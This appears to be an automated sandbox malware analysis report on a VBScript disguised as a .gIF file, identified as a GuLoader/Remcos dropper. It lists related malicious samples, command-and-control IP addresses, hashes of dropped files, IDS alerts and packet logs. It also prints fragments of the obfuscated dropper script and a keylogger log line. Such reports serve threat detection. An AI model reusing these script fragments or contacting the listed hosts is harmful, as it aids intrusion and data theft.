                   | FpiUD4nYpj.exe | Get hash | malicious | LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT | Browse | 107.173.160.137
                   | e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe | Get hash | malicious | LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT | Browse | 107.173.160.137
                   | file.exe | Get hash | malicious | LummaC, Go Injector, LummaC Stealer, SmokeLoader | Browse | 107.173.160.137
                   | jjjUC5ggb2nQMb1B6SvBkwmT.exe | Get hash | malicious | PureLog Stealer, RedLine | Browse | 23.94.183.150
                   | WIwTo1UTMq.elf | Get hash | malicious | Mirai | Browse | 104.168.36.68
                   | 172200150645e30715396b41ed298fc2fc05d94f3a962536daa72f2c5d72e7d784323a4055802.dat-decoded.exe | Get hash | malicious | Remcos | Browse | 192.3.101.142
                   | 1722001145c8336cb6887f0bbe0b12744f5c43638979603a57a5fc96eb7f34015fb312b4f7920.dat-decoded.exe | Get hash | malicious | Remcos | Browse | 192.210.214.9
                  ATGS-MMD-ASUS | file.exe | Get hash | malicious | Unknown | Browse | 34.160.144.191
                   | file.exe | Get hash | malicious | Amadey, Stealc, Vidar | Browse | 34.160.144.191
                                                        file.exeGet hashmaliciousUnknownBrowse
                                                        • 34.160.144.191
                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                        • 34.160.144.191
                                                        8NjcvPNvUr.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                        • 34.160.144.191
                                                        file.exeGet hashmaliciousUnknownBrowse
                                                        • 34.160.144.191
                                                        file.exeGet hashmaliciousUnknownBrowse
                                                        • 34.160.144.191
                                                        file.exeGet hashmaliciousUnknownBrowse
                                                        • 34.160.144.191
                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                        • 34.160.144.191
                                                        file.exeGet hashmaliciousUnknownBrowse
                                                        • 34.160.144.191
                                                        THORDC-ASIS17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.227
                                                        girlfrnd.docGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.227
                                                        waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.227
                                                        waybill_shipping_documents_original_BL_CI&PL_01_07_2024_00000000_doc.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.228
                                                        awb_shipping_post_01072024224782020031808174CN18010724000000124(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.227
                                                        UPS_Bill_of_lading_291098829T_28_06_2024_000000_pdf.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.227
                                                        ups_awb_shipping_post_26062024224782020031808174CN18240624000002624(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.227
                                                        awb_shipping_post_26062024224782020031808174CN18240624000002624(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.227
                                                        pre_alert_awb_24062024224782020031808174CN1824062400000(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.227
                                                        awb_shipping_post_24062024224782020031808174CN1824062400000(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.227
                                                        ATOM86-ASATOM86NLcreateactiveimagesbeautygirlfrnd.gIF.vbsGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        screensimplethingstohandlecream.gIF.vbsGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        41DLTjkmOm.exeGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        Shipping documents PO 16103 INV.exeGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 178.237.33.50
                                                        172200150645e30715396b41ed298fc2fc05d94f3a962536daa72f2c5d72e7d784323a4055802.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        1722001145c8336cb6887f0bbe0b12744f5c43638979603a57a5fc96eb7f34015fb312b4f7920.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        girlfrnd.docGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 178.237.33.50
                                                        erthings.docGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        girlfrnd.docGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                         Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                        No context
                                                        Process:C:\Windows\SysWOW64\wscript.exe
                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                        Category:dropped
                                                        Size (bytes):71954
                                                        Entropy (8bit):7.996617769952133
                                                        Encrypted:true
                                                        SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                        MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                        SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                        SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                        SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                        Malicious:false
                                                        Process:C:\Windows\SysWOW64\wscript.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):328
                                                        Entropy (8bit):3.235702745302682
                                                        Encrypted:false
                                                        SSDEEP:6:kKok99UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:ADImsLNkPlE99SNxAhUe/3
                                                        MD5:460E85B3CDA75F2649CD11238AD6D7C0
                                                        SHA1:50467D4CCA96C9122529F1C49F1A4E3486ABBC9C
                                                        SHA-256:B2CFB02200BD2E0DF42C070217E5EEC2DBDF830026462413E25B23F4FBFE06D7
                                                        SHA-512:B19569E1709A9044B5421DC9180470B81A278A74BD62550AD52FD175E586DC20E5B0E4CA01F39F4612DB2682FB11AD09728CFBED8C93B37CE0C559FAE574DA18
                                                        Malicious:false
                                                         Preview: binary data containing the UTF-16 string http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab followed by the quoted value "a7282eb40b1da1:0"
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):962
                                                        Entropy (8bit):5.013811273052389
                                                        Encrypted:false
                                                        SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                                                        MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                                                        SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                                                        SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                                                        SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                                                        Malicious:false
                                                         Preview:
                                                         {
                                                         "geoplugin_request":"8.46.123.33",
                                                         "geoplugin_status":200,
                                                         "geoplugin_delay":"1ms",
                                                         "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",
                                                         "geoplugin_city":"New York",
                                                         "geoplugin_region":"New York",
                                                         "geoplugin_regionCode":"NY",
                                                         "geoplugin_regionName":"New York",
                                                         "geoplugin_areaCode":"",
                                                         "geoplugin_dmaCode":"501",
                                                         "geoplugin_countryCode":"US",
                                                         "geoplugin_countryName":"United States",
                                                         "geoplugin_inEU":0,
                                                         "geoplugin_euVATrate":false,
                                                         "geoplugin_continentCode":"NA",
                                                         "geoplugin_continentName":"North America",
                                                         "geoplugin_latitude":"40.7123",
                                                         "geoplugin_longitude":"-74.0068",
                                                         "geoplugin_locationAccuracyRadius":"20",
                                                         "geoplugin_timezone":"America\/New_York",
                                                         "geoplugin_currencyCode":"USD",
                                                         "geoplugin_currencySymbol":"$",
                                                         "geoplugin_currencySymbol_UTF8":"$",
                                                         "geoplugin_currencyConverter":0
                                                         }
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):11608
                                                        Entropy (8bit):4.8908305915084105
                                                        Encrypted:false
                                                        SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
                                                        MD5:DD89E182EEC1B964E2EEFE5F8889DCD7
                                                        SHA1:326A3754A1334C32056811411E0C5C96F8BFBBEE
                                                        SHA-256:383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
                                                        SHA-512:B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
                                                        Malicious:false
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):64
                                                        Entropy (8bit):1.1940658735648508
                                                        Encrypted:false
                                                        SSDEEP:3:NlllulVmdtZ:NllUM
                                                        MD5:013016A37665E1E37F0A3576A8EC8324
                                                        SHA1:260F55EC88E3C4D384658F3C18C7FDEF202E47DD
                                                        SHA-256:20C6A3C78E9B98F92B0F0AA8C338FF0BAC1312CBBFE5E65D4C940B828AC92FD8
                                                        SHA-512:99063E180730047A4408E3EF8ABBE1C53DEC1DF04469DFA98666308F60F8E35DEBF7E32066FE0DD1055E1181167061B3512EEE4FE72D0CD3D174E3378BA62ED8
                                                        Malicious:false
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        File Type:ASCII text, with very long lines (2168), with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):26892
                                                        Entropy (8bit):5.629815532396056
                                                        Encrypted:false
                                                        SSDEEP:768:HzSR022X/523S0e8xPPmp2TkLqur5pjMpc4i:TSuce8xPP2qur5+bi
                                                        MD5:7A6E4C385A470B962384797F26BC0B8A
                                                        SHA1:5D4EEEEF8961F0CA7A83B5BAEB36BB6715D61A11
                                                        SHA-256:B13926E222564A63A3308DE6CB116C226E93CD1E9D1B5F2FCAC2DE6D80E70206
                                                        SHA-512:BA326CBBA71BBFD6054A1F3564FCF4C085ADD37C186170E039E9CF469CDD16B0FD394F028D4D09EA45FAADEEA4CF5F4EDB64F8C5DB58EB67ED93987740D8E453
                                                        Malicious:true
                                                         Preview:
                                                         Function Hazardless
                                                         Call Terminologers183.ShellExecute("P" & Essens, forsaales, "", "", Swizzled221)
                                                         End Function
                                                         Spetrevlemundstetiser = String(236,"M")
                                                         Rvertogterne = 61512
                                                         Supranaturalistic = &H617B
                                                         decreers = -54055
                                                         dermophobe = "Arkadens wienervalsenes smirkier fitzwater!"
                                                         Milieuvrns = &HFFFFB202
                                                         Fribilletternes = &HA946
                                                         Misrepresentation = 37891
                                                         Centralasiens = 4497
                                                         Unhasped = &HF896
                                                         Dommerstanden = "Trbeskyttelsen udgangene0, gtevir, afvbnede"
                                                         Hastemde = 34426
                                                         Fuppen = "Ters247 catholical152? turbomotorerne"
                                                         Actiniomorpha = "Kontrabogen netvrksadressernes; topvinklen215 stetikkers"
                                                         Slumstormer = &HFFFF6B6A
                                                         Solennitetssalen150 = 17979
                                                         Torskelevers = &H615D
                                                         Topstillingen = "Firspring tabulerer"
                                                         redigere = "Undiscerningness sprezzatura overdesirous strikkepindes"
                                                         Besttes = &H79DF
                                                         macroscopical = &H4D24
                                                         Hjlpetekstens = &H7376
                                                         Controversialism = "Sambars capitulum unfallen gnomists"
                                                         Humbug = 19967
                                                         Mongrels = -48175
                                                         unhelped = "Fortjningen widdies
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0xf87da552, page size 32768, DirtyShutdown, Windows version 10.0
                                                        Category:dropped
                                                        Size (bytes):17301504
                                                        Entropy (8bit):0.8012509433107802
                                                        Encrypted:false
                                                        SSDEEP:6144:adfjZb5aXEY2waXEY24URlMe4APXAP5APzAPwbndOO8pHAP6JnTJnTbnSotnBQ+z:YVS4e81ySaKKjLrONseWe
                                                        MD5:A33BCA794E94AD82EC7A4D8F0D298375
                                                        SHA1:146F504C7787A6A190742E8ED9D5BC87D1BBD0A5
                                                        SHA-256:AE643DAAA0EE4C8FACD93AB5B41075B0626CD28917D0A00D0F3DF2F402C67B7B
                                                        SHA-512:E5D1498DD07D008A19F372D07D97C02632DA69C25F1AE05988AB651869781FDD401E4FDB4CDDCA2C86403B235A33B186AFD15BA2E18FC614629DB20B05046BE3
                                                        Malicious:false
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):2
                                                        Entropy (8bit):1.0
                                                        Encrypted:false
                                                        SSDEEP:3:Qn:Qn
                                                        MD5:F3B25701FE362EC84616A93A45CE9998
                                                        SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                        SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                        SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                        Malicious:false
                                                        Preview:..
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):519984
                                                        Entropy (8bit):5.97310447226679
                                                        Encrypted:false
                                                        SSDEEP:6144:ZhZQKJ7e1+X814RJz1/sEa4Gv9hbtE9XcA4009r0KOD7hXDd+NayYrpqy2RtCPKZ:ZhJecX3jh/PGvrsXcAm0PdDdrEPR1Z
                                                        MD5:047E0275BDD0927F6EFEF87097F21863
                                                        SHA1:4299854E50DA9BF541FA2860DD03B635D7DFBA47
                                                        SHA-256:E0E516EA98D02BC1529767D9C3524B6EC48342AF2C5A704CE976D5F2430DF1C2
                                                        SHA-512:B094D60E78B9FD9C230BF53774BA3853321A37BE02174844B7B6B39B977641438310A14267A26977F4C88DB45E52AE5E6F0F98EBB74D8466E960FD1B958574E3
                                                        Malicious:false
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):184
                                                        Entropy (8bit):3.31406064972631
                                                        Encrypted:false
                                                        SSDEEP:3:rhlKlViNAnfVlfcl5JWRal2Jl+7R0DAlBG4phlKlViNAnfVlfIblovDl6v:6lViN55YcIeeDAlMlViNPbWAv
                                                        MD5:3F818A080E8613AA2804F9D295C8DDED
                                                        SHA1:C5BBE9697CBA2C276A7F4309F31216DBC97F5DF8
                                                        SHA-256:6B1ADF3590ECDA0E2ED6060ED2F79BAF4900D4884CA441B483E688EB7F37371B
                                                        SHA-512:B44FB3DE71399BEBB076845AB4CA375AEE4DC8EF3F69BBCCC21893AD708E4B42EFD8490527EEF5373C8015229BF4D327E631021EBB79D0232F599C5ED7A2A122
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\sfvnspt.dat, Author: Joe Security
                                                        Preview (UTF-16 decoded):[2024/07/27 07:31:02 Offline Keylogger Started]  [2024/07/27 07:31:02 Program Manager]
                                                        File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                        Entropy (8bit):3.5864483548852926
                                                        TrID:
                                                        • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                                        • MP3 audio (1001/1) 32.22%
                                                        • Lumena CEL bitmap (63/63) 2.03%
                                                        • Corel Photo Paint (41/41) 1.32%
                                                        File name:createdthingstobefrankwithmeeverywhere.gIF.vbs
                                                        File size:415'824 bytes
                                                        MD5:4d03b030f4db434da80e0ec3fa7e4398
                                                        SHA1:0b4eed00595be5235f5a51cebeda6fa31402b94b
                                                        SHA256:90afe2e4506b34bd63e597279707d13c6d8512fd52e0b670c9e45890211c76b6
                                                        SHA512:7ec4df4e21931e9091e77d9a23c7d81de11b89c3d0968cd6e8aba8f425cda85b357e4410b3a5a0bb28e80c2ad4999d8c3cc1fba06a2346720f3abad435ce9ebb
                                                        SSDEEP:3072:bHGMwf1YFjhNe4VTdRnTT8w4TW72qjnEgFypBzxjJS7GzYhOJ8XuBYO0zCV2:Xwf1YFB2qjt
                                                        TLSH:64949F5262ED5008B5F33F04AABAA2654A3BFED9DC79C54D458C6A5D0BE3900DC70BB3
                                                        File Content Preview (UTF-16 decoded, truncated):
                                                        dim gamelan
                                                        gamelan = opsophagia
                                                        cabirto("bistorta") & gamelan & _
                                                        cabirto("lacha") & gamelan & _
                                                        cabirto("canto") & gamel
                                                        Icon Hash:68d69b8f86ab9a86
                                                        Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
                                                        2024-07-27T13:31:04.851966+0200 | TCP | 2032777 | ET MALWARE Remcos 3.x Unencrypted Server Response | 57484 | 49706 | 192.253.251.227 | 192.168.2.5
                                                        2024-07-27T13:31:01.367604+0200 | TCP | 2049038 | ET MALWARE Malicious Base64 Encoded Payload In Image | 80 | 49704 | 198.46.176.133 | 192.168.2.5
                                                        2024-07-27T13:31:03.293177+0200 | TCP | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 49706 | 57484 | 192.168.2.5 | 192.253.251.227
                                                        2024-07-27T13:31:24.727754+0200 | TCP | 2012510 | ET SHELLCODE UTF-8/16 Encoded Shellcode | 443 | 49719 | 93.113.54.56 | 192.168.2.5
                                                        2024-07-27T13:31:02.365590+0200 | TCP | 2020424 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 | 80 | 49705 | 104.168.45.34 | 192.168.2.5
                                                        2024-07-27T13:31:24.608086+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 49719 | 443 | 192.168.2.5 | 93.113.54.56
                                                        2024-07-27T13:33:08.503059+0200 | TCP | 2032777 | ET MALWARE Remcos 3.x Unencrypted Server Response | 57484 | 49706 | 192.253.251.227 | 192.168.2.5
                                                        2024-07-27T13:31:16.345911+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49712 | 20.114.59.183 | 192.168.2.5
                                                        2024-07-27T13:31:54.656391+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49721 | 20.114.59.183 | 192.168.2.5
                                                        2024-07-27T13:31:17.499992+0200 | TCP | 2012510 | ET SHELLCODE UTF-8/16 Encoded Shellcode | 443 | 49711 | 93.113.54.56 | 192.168.2.5
                                                        2024-07-27T13:31:06.094770+0200 | TCP | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 49709 | 80 | 192.168.2.5 | 178.237.33.50
                                                        2024-07-27T13:31:00.255775+0200 | TCP | 2047750 | ET MALWARE Base64 Encoded MZ In Image | 80 | 49704 | 198.46.176.133 | 192.168.2.5
                                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                        Jul 27, 2024 13:31:00.072796106 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.072810888 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.072813034 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.072834015 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.073153973 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.073194981 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.073215961 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.073230982 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.073266029 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.073390961 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.073405981 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.073421001 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.073436022 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.073441029 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.073477030 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.073637962 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.073652983 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.073667049 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.073681116 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.073689938 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.073695898 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.073712111 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.073712111 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.073755980 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.073985100 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.074018955 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.074033976 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.074058056 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.074217081 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.074232101 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.074245930 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.074254990 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.074261904 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.074280024 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.074439049 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.074460983 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.074476004 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.074481010 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.074491024 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.074506044 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.074515104 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.074522018 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.074547052 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.074893951 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.074935913 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.074939966 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.074954987 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.075000048 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.161262989 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.161302090 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.161317110 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.161345005 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.161374092 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.161387920 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.161402941 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.161416054 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.161422014 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.161451101 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.161629915 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.161664963 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.161670923 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.161679983 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.161695004 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.161710024 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.161720037 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.161725044 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.161741018 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.161747932 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.161753893 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.161799908 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.162750959 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.162792921 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.162797928 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.162808895 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.162849903 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.162969112 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.162983894 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.162998915 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.163013935 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.163023949 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.163053036 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.163208008 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.163223028 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.163238049 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.163276911 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.163448095 CEST8049704198.46.176.133192.168.2.5
